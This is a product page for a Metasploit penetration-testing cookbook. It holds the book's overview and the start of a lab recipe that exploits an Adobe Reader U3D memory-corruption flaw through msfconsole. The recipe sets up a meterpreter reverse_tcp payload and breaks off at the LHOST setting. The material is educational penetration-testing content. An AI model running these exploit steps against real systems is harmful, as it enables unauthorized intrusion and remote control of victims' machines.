Book Image

Metasploit Penetration Testing Cookbook, Second Edition

By : Monika Agarwal, Abhinav Singh
Book Image

Metasploit Penetration Testing Cookbook, Second Edition

By: Monika Agarwal, Abhinav Singh

Overview of this book

<p>Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.</p> <p>Metasploit Penetration Testing Cookbook, Second Edition contains chapters that are logically arranged with an increasing level of complexity and thoroughly covers some aspects of Metasploit, ranging from pre-exploitation to the post-exploitation phase. This book is an update from version 4.0 to version 4.5. It covers the detailed penetration testing techniques for different specializations like wireless networks, VOIP systems, and the cloud.</p> <p>Metasploit Penetration Testing Cookbook, Second Edition covers a number of topics which were not part of the first edition. You will learn how to penetrate an operating system (Windows 8 penetration testing) to the penetration of a wireless network, VoIP network, and then to cloud.</p> <p>The book starts with the basics, such as gathering information about your target, and then develops to cover advanced topics like building your own framework scripts and modules. The book goes deep into operating-systems-based penetration testing techniques and moves ahead with client-based exploitation methodologies. In the post-exploitation phase, it covers meterpreter, antivirus bypass, ruby wonders, exploit building, porting exploits to the framework, and penetration testing, while dealing with VOIP, wireless networks, and cloud computing.</p> <p>This book will help readers to think from a hacker's perspective to dig out the flaws in target networks and also to leverage the powers of Metasploit to compromise them. It will take your penetration skills to the next level.</p>
Table of Contents (18 chapters)
Metasploit Penetration Testing CookbookSecond Edition
Credits
About the Authors
About the Reviewers
www.PacktPub.com
Preface
Index

Working with Adobe Reader U3D Memory Corruption


This module exploits vulnerability in the U3D handling within Versions 9.x through 9.4.6 and 10 through 10.1.1 of Adobe Reader. There is a vulnerabilty here because of the use of uninitialized memory. Random code execution is gained by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled.

Getting ready

Here we are using Windows XP SP3 as the target machine and BackTrack 5 R3 as an attacker machine. To start with, start msfconsole and it will show you the following:

msf>

How to do it...

In this recipe, we will again be exploiting a remote machine by leveraging a flaw in Adobe that is U3D Memory Corruption:

Msf  > use exploit/windows/adobe_reader_u3d
Msf exploit (adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
Payload =>  windows/meterpreter/reverse_tcp
Msf exploit (adobe_reader_u3d) > set LHOST...